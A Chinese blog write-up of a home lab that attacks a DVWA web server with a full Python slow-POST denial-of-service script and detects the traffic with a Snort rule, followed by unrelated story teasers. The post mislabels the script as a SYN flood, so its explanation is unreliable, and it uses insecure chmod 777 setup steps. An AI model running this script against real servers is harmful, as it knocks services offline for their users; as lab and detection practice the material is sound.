使用Python+Snort进行DoS攻防实战

最近对DoS攻击进行了实战,这里做个记录

环境

实验用到了两台虚拟机,分别是攻击机和靶机,其配置如下:

  • 攻击机
    • Windows 10
    • Python3.8.2
  • 靶机
    • Ubuntu 20.04
    • web server(这里用的DVWA作为网站,xamp作为服务器)
    • Snort 2.9.18.1

环境搭建

攻击机

直接在官网下载Python3,无脑双击安装即可

靶机

网站搭建

下载网站源码,这里直接拿的DVWA的源码做实验

下载官方推荐的xampp

执行命令:

sudo chmod 777 xampp-linux-x64-7.4.3-0-installer.run
sudo ./xampp-linux-x64-7.4.3-0-installer.run

在弹出来的界面处,点击Welcome界面,点击Open Application Folder

打开目录

找到hotdocs文件夹,将解压后的dvwa网站源码放进去,并运行以下命令:

sudo chmod 777 -R DVWA-master

点击Manage Servers,然后点击Start All按钮:

start all

全绿即可。

如果绿不了,尝试以下命令即可解决:

sudo service mysql stop
sudo service mysqld stop
sudo service nginx stop
sudo service apache stop
sudo service apache2 stop

然后修改网站源码下的config文件夹内的config.inc.php.distconfig.inc.php,然后更改文件内容(主要是数据库账号密码)

然后就可以打开网站了:


网站搭建成功

Snort安装

这里参考博客进行安装,不再赘述

环境配置

靶机snort配置

首先使用命令编辑snort.conf

sudo gedit /etc/snort/snort.conf

将其中的RULE_PATH更改为实际环境中存放规则的路径

使用命令编辑local.rules(具体路径根据实际情况来):

sudo gedit /etc/snort/rules/rules/local.rules

添加DoS攻击检测规则在文件末尾:

alert tcp any any -> $HOME_NET 80 (flags: S; msg: "Possible DoS Attack Type: SYN flood"; classtype:attempted-dos; flow:stateless; sid:3; detection_filter:track by_dst, count 20, seconds 10;)

其中:

  • alert表示显示为告警
  • tcp表示检测的协议
  • any any表示检测任意IP和端口发送的数据包
  • ->表示to
  • $HOME_NET表示目的ip
  • 80表示目的端口
  • flags用于检查是否存在特定的TCP标志位,这里的-S表示- SYN - Synchronize sequence numbers,其他参数具体可见官方文档
  • msg表示显示在告警中的描述
  • classtype表示告警分类,不可随意命名,其可选参数可见官方文档
  • flow关键字与会话跟踪一起使用,它允许规则只适用于交通流的某些方向。这里的stateless表示触发器与流处理器的状态无关,其他参数具体可见官方文档
  • sid表示规则的唯一标识符,由于100-1,000,000的号码均已被注册,因此需要自定义一个该范围之外的数字
  • detection_filter定义了一个速率,在规则生成事件之前,源主机或目标主机必须超过这个速率,这里设定为10秒内的数据包达到20个即判定为DoS攻击

规则设定完成之后,首先运行命令查看网卡:

ifconfig
网卡查看

注意图中红框圈出的地方即为网卡标识符

然后验证并配置规则:

sudo snort -T -c /etc/snort/snort.conf -i ens33

其中:

  • -c表示configuration,即使用/etc/snort/snort.conf作为配置文件
  • -i表示interface,即调用的网卡接口,这里使用上文中查看到的网卡标识符

出现以下界面则表示规则书写并配置正确:


规则配置成功

攻击机DoS脚本

参考网上的DoS攻击源码,改一改使其适用于Python3,脚本源码为:

#!/usr/bin/env python
import socket
import time
import threading
#Pressure Test,ddos tool
#---------------------------
MAX_CONN=20000
PORT=80
HOST="192.168.80.133"
PAGE="/DVWA-master/login.php"
#---------------------------
 
buf=(("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST)).encode())
 
socks=[]
 
def conn_thread():
    global socks
    for i in range(0,MAX_CONN):
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        try:
            s.connect((HOST,PORT))
            s.send(buf)
            print("Send buf OK!,conn=%d\n"%i)
            socks.append(s)
        except Exception as ex:
            print("Could not connect to server or send error:%s"%ex)
            time.sleep(10)
#end def
 
def send_thread():
    global socks
    while True:
        for s in socks:
            try:
                s.send(b"f")
                #print("send OK!")
            except Exception as ex:
                print("Send Exception:%s\n"%ex)
                socks.remove(s)
                s.close()
        time.sleep(1)
#end def
 
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
 
conn_th.start()
send_th.start()

然后保存为DOS.py备用
其攻击原理为不停地向目标机器发送TCP握手请求,发送SYN包建立连接,但不发送ACK包完成连接,从而导致目标机器一直处于等待连接建立的状态,消耗大量系统资源,从而没有剩余资源对正常的网络请求进行响应。

攻击&检测

在靶机使用命令启动snort:

sudo snort -A console -q -c /etc/snort/snort.conf -i ens33

其中:

  • -A console表示显示标准的告警输出
  • -q表示quiet,即以静默模式启动
  • -c表示配置文件
  • -i表示接口

然后在攻击机中,打开cmd窗口,使用命令运行脚本:

python3 DOS.py
实施攻击

此时,通过浏览器打开原网站,可以发现页面无法正常加载,攻击实施成功,甚至还把数据库账号密码爆了出来hhhh(图中打码处为数据库密码):


无法打开网页

然后查看靶机,可看到检测到了DoS攻击,表明检测规则有效:


检测到DoS攻击

参考资料

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 194,088评论 5 459
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 81,715评论 2 371
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 141,361评论 0 319
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 52,099评论 1 263
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 60,987评论 4 355
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 46,063评论 1 272
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 36,486评论 3 381
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 35,175评论 0 253
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 39,440评论 1 290
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 34,518评论 2 309
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 36,305评论 1 326
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 32,190评论 3 312
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 37,550评论 3 298
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 28,880评论 0 17
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,152评论 1 250
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 41,451评论 2 341
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 40,637评论 2 335

推荐阅读更多精彩内容